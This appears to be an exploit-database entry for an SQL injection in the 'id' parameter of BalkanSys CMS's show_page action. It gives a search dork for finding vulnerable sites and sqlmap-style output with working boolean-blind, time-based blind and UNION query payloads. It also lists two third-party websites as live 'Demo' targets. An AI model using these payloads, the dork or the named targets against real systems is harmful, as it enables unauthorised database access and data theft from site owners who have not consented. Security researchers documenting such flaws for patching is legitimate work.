BalkanSys CMS show_pageID SQL injection Vulnerability

2018-06-03
ID: 98194
CVE: None
Download vulnerable application: None
######################
# Exploit Title : BalkanSys CMS show_pageID SQL injection
# Exploit Author : xBADGIRL21
# Dork : inurl:/?act=show_page or inurl:/?act=show_page "Balkansys"
# Category: [ Webapps ]
# version: BalkanSys CMS 2.x - 3.x
# Tested on: [ Linux | Windows ]
# Vendore : http://balkansys.com/
# skype:xbadgirl21
# Date: 2016/07/07
# video Proof : https://youtu.be/pdLAMA2bBrQ
######################
# PoC:
# http://www.site.com/?act=show_page&id=[SQLi]
######################
+ test:=> http://www.site.com/?act=show_page&id=[76] INJECT HERE
# respone:==>
# [09:39:30] [INFO] GET parameter 'id' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' " injectable "
# Parameter: id (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: act=show_page&id=76' AND 9301=9301 AND 'thUL'='thUL
#
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
# Payload: act=show_page&id=76' AND (SELECT * FROM (SELECT(SLEEP(5)))oZvn) AND 'ysNR'='ysNR
#
# Type: UNION query
# Title: Generic UNION query (NULL) - 19 columns
# Payload: act=show_page&id=-8914' UNION ALL SELECT #NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171627671,0x4d4b6d63774a4d4e546c,0x717a786a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
+ Demo
+ http://optela.com/?act=show_page&id=76
+ http://saturaad.com/?act=show_page&id=165
######################
# Discovered by : xBADGIRL21
# Greetz : All Mauritanien Hackers - NoWhere
#######################
1-4-2 (www02)